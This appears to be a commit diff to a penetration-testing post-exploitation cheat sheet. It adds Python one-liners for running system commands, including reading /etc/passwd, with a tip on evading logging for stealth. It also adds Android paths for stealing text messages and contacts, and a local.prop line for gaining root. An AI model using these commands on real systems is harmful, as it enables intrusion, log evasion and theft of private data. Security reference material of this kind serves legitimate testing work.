Merge pull request #61 from Su1ph3r/master

WebBreacher · WebBreacher · commit 7b4206deb58a · 2014-01-12T15:56:50.000-08:00
Android/Python
diff --git a/scripting/python.md b/scripting/python.md
@@ -18,3 +18,15 @@ python -c 'import pty; pty.spawn("/bin/bash")'```
 ***Print all ASCII characters***
 ```python
 python -c 'import string; print string.printable'```
+
+**Run OS commands through Python Interpreter**
+```python
+python -c 'import os; os.system("command here")'```
+
+example:
+
+```
+python -c 'import os; os.system("cat /etc/passwd")'```
+
+Remember that the python console does not log code by default, so you can run all post-exploit shenanigans through the python console for added stealth. 
+Also gets by certain environmental restrictions.
diff --git a/tech/mobile/android.md b/tech/mobile/android.md
@@ -1,3 +1,35 @@
-# Place Holder
+# Android
+
+##Files to grab
+
+###Text Messages (Needs Root):
+
+```
+/data/data/com.android.providers/telephony/databases/mmssms.db
+/data/data/com.android.providers.telephony/databases/mmssms.db
+```
+
+###Contacts (Needs Root):
+
+```
+/data/data/android.providers.contacts/databases
+```
+
+###Local System Settings:
+
+```
+/data/local.prop
+```
+
+If you can write to this file the following line will grant root:
+
+```
+echo "ro.kernel.qemu=1" > /data/local.prop
+```
+
+###Device Settings:
+
+```
+/system/build.prop
+```
 
-Content coming. Feel free to submit ;-)
diff --git a/tech/mobile/index.md b/tech/mobile/index.md
@@ -0,0 +1,6 @@
+# Mobile
+
+Got a shell on a mobile device? Here's some things to do next.
+
+* [Android](android.md) - Android Post Exploitation
+* [iOS](ios.md) - iOS Post Exploitation
